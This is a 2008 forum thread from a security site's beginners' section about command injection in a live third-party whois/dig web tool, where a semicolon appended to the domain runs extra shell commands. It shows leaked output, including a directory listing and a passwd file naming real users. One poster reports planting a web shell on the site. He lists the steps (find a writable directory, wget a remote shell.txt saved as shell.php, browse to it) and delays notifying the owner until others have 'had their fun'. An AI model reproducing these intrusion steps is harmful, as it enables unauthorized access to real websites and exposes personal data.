Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 55
Members: 0
Total: 55
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Hmm question
Post new topicReply to topic View previous topic :: View next topic
Hmm question
PostPosted: Sat Jun 07, 2008 3:05 am Reply with quote
Chedda
Active user
Active user
Joined: May 26, 2008
Posts: 27




So I was browsing around looking for a good place for a wannabe hacker. I came across this, but wasn't given any information on how its performed. I have been looking elsewhere to find more information on this exploit and I think I would something, but not even sure if its correct. "whois.net is running a shell command, you can end one and start another. You'd do that by adding a semicolon to the Dig arguments."

So I tried such commands as website.com;ls -a and it actually works, but not like the below. Can anyone fill in the gaps?


Quote:

You Are Searching For ***censored due to it being a spoiler*** /etc/passwd:

; <<>> DiG 9.2.3 <<>>
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34366
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 14

;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 154054 IN NS G.ROOT-SERVERS.NET.
. 154054 IN NS K.ROOT-SERVERS.NET.
. 154054 IN NS A.ROOT-SERVERS.NET.
. 154054 IN NS I.ROOT-SERVERS.NET.
. 154054 IN NS L.ROOT-SERVERS.NET.
. 154054 IN NS D.ROOT-SERVERS.NET.
. 154054 IN NS C.ROOT-SERVERS.NET.
. 154054 IN NS M.ROOT-SERVERS.NET.
. 154054 IN NS F.ROOT-SERVERS.NET.
. 154054 IN NS H.ROOT-SERVERS.NET.
. 154054 IN NS E.ROOT-SERVERS.NET.
. 154054 IN NS J.ROOT-SERVERS.NET.
. 154054 IN NS B.ROOT-SERVERS.NET.

;; ADDITIONAL SECTION:
K.ROOT-SERVERS.NET. 509993 IN A 193.0.14.129
K.ROOT-SERVERS.NET. 509993 IN AAAA 2001:7fd::1
L.ROOT-SERVERS.NET. 603676 IN A 199.7.83.42
M.ROOT-SERVERS.NET. 603676 IN A 202.12.27.33
M.ROOT-SERVERS.NET. 603676 IN AAAA 2001:dc3::35
A.ROOT-SERVERS.NET. 603676 IN A 198.41.0.4
A.ROOT-SERVERS.NET. 603676 IN AAAA 2001:503:ba3e::2:30
B.ROOT-SERVERS.NET. 602195 IN A 192.228.79.201
C.ROOT-SERVERS.NET. 602195 IN A 192.33.4.12
D.ROOT-SERVERS.NET. 509993 IN A 128.8.10.90
E.ROOT-SERVERS.NET. 603676 IN A 192.203.230.10
F.ROOT-SERVERS.NET. 514317 IN A 192.5.5.241
F.ROOT-SERVERS.NET. 514317 IN AAAA 2001:500:2f::f
G.ROOT-SERVERS.NET. 514317 IN A 192.112.36.4

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue May 20 23:05:41 2008
;; MSG SIZE rcvd: 500

# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
ftp:*:21:21:Anonymous FTP User:/ftp:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
webadmin:*:79:79:Web Admin:/usr/local/apache:/bin/csh
www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
websitetools:*:1001:1001:Administrative User:/home/websitetools:/bin/tcsh
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
dgudema:*:1002:1002:Daniel Gudema:/home/dgudema:/bin/tcsh
bibana:*:1003:1003:Bryant Ibana:/home/bibana:/usr/local/bin/bash
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin


Last edited by Chedda on Sun Jun 08, 2008 12:39 am; edited 1 time in total
View user's profile Send private message
PostPosted: Sat Jun 07, 2008 7:16 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




Interesting, good find. You could now use wget and upload shell.
How did you find this vulnerability?


and btw, No links to vulnerable sites.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sat Jun 07, 2008 4:41 pm Reply with quote
Chedda
Active user
Active user
Joined: May 26, 2008
Posts: 27




I was merely googling random thing about hacking in general and came across it on a forum. I didn't really find anything someone else did all the work. The forum is dead though and the post a couple of months old. They never said what they did to accomplish this, so I was wondering if you knew what command they used?


Code:
website.com;ls -a
only returns

Quote:
You Are Searching For ****.com;ls -a:

; <<>> DiG 9.2.3 <<>> ****.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60077
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;****.com. IN A

;; ANSWER SECTION:
****.com. 43200 IN A 65.162.***.***

;; AUTHORITY SECTION:
****.com. 43200 IN NS ns2.address.com.
****.com. 43200 IN NS ns1.address.com.

;; Query time: 104 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sat Jun 7 16:39:40 2008
;; MSG SIZE rcvd: 85

.
..
.htaccess
Application.php
Browsersize.URL
admin
back.jpg
circuit.dtd
circuit.xml
dspHelloWorld.php
dspTesting.php
dsp_about.php
fusebox.dtd
fusebox.init.php
fusebox.xml
fusebox4.loader.php4.php
fusebox4.parser.php4.php
fusebox4.runtime.php4.php
fusebox4.transformer.php4.php
includes
index.php
index_old.html
ipaddress
layFooter.php
layHeader.php
layouts
left.jpg
lib
manual
parsed
ping
plugins
protolize
right.jpg
seo
tools
udf_canonicalpath.php
udf_relativefilepath.php
validator
websites
websitetools.css
whois
whois.net
View user's profile Send private message
PostPosted: Sat Jun 07, 2008 6:08 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Try website.com;pwd
View user's profile Send private message
PostPosted: Sun Jun 08, 2008 12:15 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




I successfully uploaded a shell. Too easy.

When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously who would want to be malicious against a site like that.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 08, 2008 12:33 am Reply with quote
Chedda
Active user
Active user
Joined: May 26, 2008
Posts: 27




gibbocool wrote:
I successfully uploaded a shell. Too easy.

When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously who would want to be malicious against a site like that.


Hehe glad to see someone got some use out of it. As far I am concerned you can email them I will never figure out how to use it sadly.
View user's profile Send private message
PostPosted: Sun Jun 08, 2008 4:50 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




Quite simple, it's just a matter of knowing unix commands. If you don't know them, i advise you to install linux such as Ubuntu and have a play.

All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php

I'll wait a couple days then email them.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 08, 2008 5:00 am Reply with quote
Chedda
Active user
Active user
Joined: May 26, 2008
Posts: 27




gibbocool wrote:
Quite simple, it's just a matter of knowing unix commands. If you don't know them, i advise you to install linux such as Ubuntu and have a play.

All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php

I'll wait a couple days then email them.


Why can't even be as cool as you Gibbocool. You make everything so simple, love it!
View user's profile Send private message
PostPosted: Wed Jun 11, 2008 5:40 pm Reply with quote
Kazuma
Beginner
Beginner
Joined: May 17, 2008
Posts: 3
Location: Zwollywood




No succes for me on multiple websites. It just returns a list of my local machine Laughing
View user's profile Send private message
Hmm question
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.051 Seconds